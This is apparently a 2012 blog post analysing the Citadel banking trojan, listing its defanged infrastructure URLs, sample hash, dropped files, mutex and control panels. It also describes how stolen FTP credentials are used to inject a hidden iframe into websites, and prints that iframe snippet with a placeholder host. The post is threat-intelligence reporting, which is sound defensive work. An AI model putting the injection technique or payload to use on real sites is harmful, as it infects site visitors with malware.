viernes, 31 de agosto de 2012

Citadel Banker Malware

Troyan Citadel is an evolution from the famous ZEUS banker troyan. Citadel Developers have used the old features of Zeus malware adding new funcionalities for their criminals purposes. As video capturing from compromised machines (useful for viewing the user's action with virtual keyboards), sending stolen login credentials via the electronic messaging application Jabber, etc..


Has been found the Infrastructure of citadel malware version hosted at helikopterz1922.in domain that resolves 194.1.184.74 IP belonging to PROVITEX provider in Russia.

Troyan infection vector is located at URL: hxxp://helikopterz1922.in/xoiajcss/file.php

It downloads the malicious binary file:

hxxp://helikopterz1922.in/xoiajcss/files/tomat.exe

And also download Citadel settings configuration from the address:

hxxp://helikopterz1922.in/xoiajcss/files/tomatconfig.bin

After analyzing behavior of malicious binary file tomat.exe (MD5: 982e1a20030408cad318309a076a6539) In the infected computer were created this files:

%AppData%\Eqbi\tooz.exe
%AppData%\Naosif\iwox.mik
%AppData%\Naosif\iwox.tmp
%AppData%\Neep\xidi.yvr
%Temp%\tmp20ae17ad.bat

In addition to modifying system register and create Mutex to mark its presence on the compromised computer: Local \ {CA7FD20C-31FB-4F90-B762-F45413F09EC3}

Login control panel of this citadel troyan is located at URL:

hXXp://helikopterz1922.in/xoiajcss/cp.php?m=login

As shown in next screen capture:



In this Control Panel infrastructure there is also installed "VncFox 2012 - Citadel Software" Panel which is a Control Panel of Botnets of infected computers that use the VNC application to take full remote control of the compromised computers by accessing its desktop.

VNC control panel is accessed via the URL:

hXXp://helikopterz1922.in/xoiajcss/vnc/admin.php


MALICIUS IFRAMES INJECTION

At same server malware domain infrastructure there is located another Citadel control panel with the difference that is configured to inject malicious Iframes at Webs servers which access credentials have been captured by the Troyan.

This citadel Control Panel is located at:

hXXp://helikopterz1922.in/zaqiryt/cp.php?m=login



Citadel takes advantage of an old known Zeus Trojan functionality that were used to automatically captured login credentials to any FTP server that were opened session on the compromised machine.

With this compromised FTP credentials, Citadel Control Panel is able to connect via FTP to those servers to perform a recursive search of the public web folders * www * ',' public * ',' domain * ',' * host * ',' ht * docs ',' * site * ',' * web * ', where usually are hosted the websites to track files with extensions or names as ' index. * ',' *. js', '*. htm *', and inject code into with the malicious iframe that has set up for downloading Malware.

'< I F R A M E src="hXXp://example.com/" width=1 height=1 style="visibility: hidden">
',
Of this way servers websites will be modified and whenever they will be visited by a client , the malicious iframe will redirect users web surfing to the malicious Iframe and infection will start on the computer.

Below is showed a setup of Citadel Trojan configuration that is used to perform the malicious iframe injection







No hay comentarios:

Publicar un comentario en la entrada

Nota: solo los miembros de este blog pueden publicar comentarios.